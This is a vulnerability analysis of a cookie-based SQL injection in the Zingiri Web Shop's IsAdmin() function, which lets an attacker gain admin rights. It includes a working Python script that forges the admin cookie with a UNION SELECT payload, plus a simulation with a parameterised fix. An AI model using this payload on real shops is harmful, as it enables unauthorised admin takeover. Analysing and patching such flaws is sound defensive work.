Advisory
Secunia Advisory SA 49398
Analysis of vulnerability
This vulnerability comes from a lack of validation in the Zingiri Web Shop IsAdmin() function in /fws/includes/subs.inc.php of the values taken from the fws_cust cookie. The function tries to determine whether the current user is an admin like this:
```php
// is the id of an admin?
Function IsAdmin() {
    Global $dbtablesprefix,$integrator;
    if ($integrator->isAdmin()) return true; //joomla
    if (wsCurrentCmsUserIsShopAdmin()) return true;
    if (function_exists('wsLiveIsAdmin') && wsLiveIsAdmin()) return true;
    if (!isset($_COOKIE['fws_cust'])) {
        return false;
    }
    // cookie format: <ignored>#<customer id>#<md5 of the password column>
    $fws_cust = explode("#", $_COOKIE['fws_cust']);
    $customerid = $fws_cust[1];
    $md5pass = $fws_cust[2];
    // the only check on $customerid is that it exists; it is never validated as a number
    if (is_null($customerid)) {
        return false;
    }
    // $customerid is concatenated straight into the SQL string: the injection point
    $f_query = "SELECT * FROM ".$dbtablesprefix."customer WHERE ID = " . $customerid;
    if ($f_sql = mysql_query($f_query)) {
        while ($f_row = mysql_fetch_row($f_sql)) {
            // column 14 must be ADMIN and md5(column 3) must match the cookie
            if ($f_row[13] == "ADMIN" && md5($f_row[2]) == $md5pass) {
                // column 7 must match the requesting IP
                if ($f_row[6] == GetUserIP()) {
                    return true;
                } else {
                    return false;
                }
            } else {
                return false;
            }
        }
    }
    return false;
}
```
It splits (explode!) the fws_cust cookie on the # character, takes a user ID from the second field and an MD5 password hash from the third (the first field is ignored), and then fetches the corresponding customer row from the database. Notice that the only check applied to $customerid is is_null() (line 232 of the original file) and that it is then concatenated straight into the SQL string (line 235), so this is a SQL injection. Since the role, password-hash and IP checks all run against whatever row the query returns, we can use a UNION SELECT to supply a row of our own choosing: column 14 ($f_row[13]) set to ADMIN, column 7 ($f_row[6]) set to our own IP, and column 3 ($f_row[2]) set to the literal 3, whose MD5 (eccbc87e4b5ce2fe28308fd9f2a7baf3) goes into the third cookie field. The following simple Python script forges such a cookie and grants us admin rights:
```python
# Forge a fws_cust cookie whose "customer ID" field is a UNION SELECT that
# returns a fake ADMIN row for the attacker's IP. The third cookie field is
# md5("3"), because the injected row puts the literal 3 in column 3.
def ToHexString(input):
    # MySQL 0x... hex string literal, so no quote characters appear in the cookie
    hexString = "0x"
    for s in input:
        hexString += "%02x" % ord(s)
    return hexString

cookie = "fws_cust=X#99999 UNION SELECT 1, 2, 3, 4, 5, 6, %s, 8, 9, 10, 11, 12, 13, %s, 15, 16, 17, 18, 19 FROM wp_zing_customer#eccbc87e4b5ce2fe28308fd9f2a7baf3" % (ToHexString(input("Enter attacker IP:")), ToHexString("ADMIN"))
print(cookie)
```
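To see the whole chain end to end, here is an added example (not code from the original post or from the Zingiri project): a Python simulation of the cookie branch of IsAdmin() against an in-memory SQLite table, the forged cookie from the script above, and a parameterised version of the check that closes the hole. Assumptions: the table name wp_zing_customer is taken from the script above, the 19-column layout and the sample admin row are constructed for the example, and SQLite stands in for MySQL, so the injected strings are quoted rather than written as MySQL 0x hex literals.

```python
import hashlib
import hmac
import sqlite3

# Constructed 19-column stand-in for the customer table. Only the columns
# IsAdmin() reads get meaningful names: index 0 = ID, 2 = password,
# 6 = IP, 13 = role. The rest are padding so the injected UNION SELECT has
# the same width as the page's payload.
COLUMNS = (["ID", "name", "password", "c4", "c5", "c6", "ip"]
           + [f"c{i}" for i in range(8, 14)] + ["role"]
           + [f"c{i}" for i in range(15, 20)])
TABLE = "wp_zing_customer"   # name from the page's script (assumed WordPress install)


def make_db():
    """In-memory SQLite stand-in for the MySQL table, with one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {TABLE} ({', '.join(COLUMNS)})")
    row = [1, "alice", "s3cret", "", "", "", "203.0.113.5"] + [""] * 6 + ["ADMIN"] + [""] * 5
    conn.execute(f"INSERT INTO {TABLE} VALUES ({', '.join('?' * 19)})", row)
    conn.commit()
    return conn


def md5_hex(value):
    # PHP's mysql_fetch_row() hands md5() a string even for numeric literals,
    # so the SELECTed literal 3 hashes as "3".
    return hashlib.md5(str(value).encode()).hexdigest()


def is_admin_vulnerable(conn, cookie, client_ip):
    """Translation of the cookie branch of IsAdmin(): the customer ID from the
    cookie is concatenated into the SQL string, exactly as on the page."""
    parts = cookie.split("#")            # explode("#", $_COOKIE['fws_cust'])
    if len(parts) < 2:                   # $fws_cust[1] missing -> is_null() -> false
        return False
    customerid = parts[1]
    md5pass = parts[2] if len(parts) > 2 else ""
    query = f"SELECT * FROM {TABLE} WHERE ID = " + customerid   # injection point
    for row in conn.execute(query):
        if row[13] == "ADMIN" and md5_hex(row[2]) == md5pass:
            return row[6] == client_ip
        return False
    return False


def forge_cookie(attacker_ip):
    """Same payload as the page's script, with quoted strings instead of MySQL
    0x hex literals (SQLite has no string-valued 0x literal). ID 99999 is assumed
    not to exist, so the only row returned is the injected one; its column 3 is
    the literal 3, hence the third cookie field is md5("3")."""
    injected = (f"99999 UNION SELECT 1, 2, 3, 4, 5, 6, '{attacker_ip}', 8, 9, 10, 11, 12, 13, "
                f"'ADMIN', 15, 16, 17, 18, 19 FROM {TABLE}")
    return f"X#{injected}#{md5_hex('3')}"


def is_admin_hardened(conn, cookie, client_ip):
    """Same checks, but the ID is parsed as an integer and bound as a query
    parameter, so the cookie can no longer change the query. The cookie scheme
    itself (an unsalted md5 of column 3) is left as the page shows it; only the
    injection is closed."""
    parts = cookie.split("#")
    if len(parts) != 3:
        return False
    try:
        customerid = int(parts[1])
    except ValueError:
        return False
    row = conn.execute(f"SELECT * FROM {TABLE} WHERE ID = ?", (customerid,)).fetchone()
    if row is None or row[13] != "ADMIN" or row[6] != client_ip:
        return False
    return hmac.compare_digest(md5_hex(row[2]).encode(), parts[2].encode())


if __name__ == "__main__":
    db = make_db()
    forged = forge_cookie("198.51.100.7")
    legit = f"X#1#{md5_hex('s3cret')}"
    print("forged cookie:", forged)
    print("vulnerable, forged:", is_admin_vulnerable(db, forged, "198.51.100.7"))  # True
    print("vulnerable, legit :", is_admin_vulnerable(db, legit, "203.0.113.5"))    # True
    print("hardened, forged  :", is_admin_hardened(db, forged, "198.51.100.7"))    # False
    print("hardened, legit   :", is_admin_hardened(db, legit, "203.0.113.5"))      # True
```

The vulnerable path accepts the forged cookie only from the IP baked into the payload, which mirrors the $f_row[6] == GetUserIP() check on the page; the hardened path rejects it because "99999 UNION SELECT ..." is not an integer, and a real customer ID bound as a parameter can only ever select that customer's own row.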
Numerous other vulnerabilities using the same attack vector were fixed at the same time, the result of copy and paste; they can be found in the code quite easily and exploited the same way.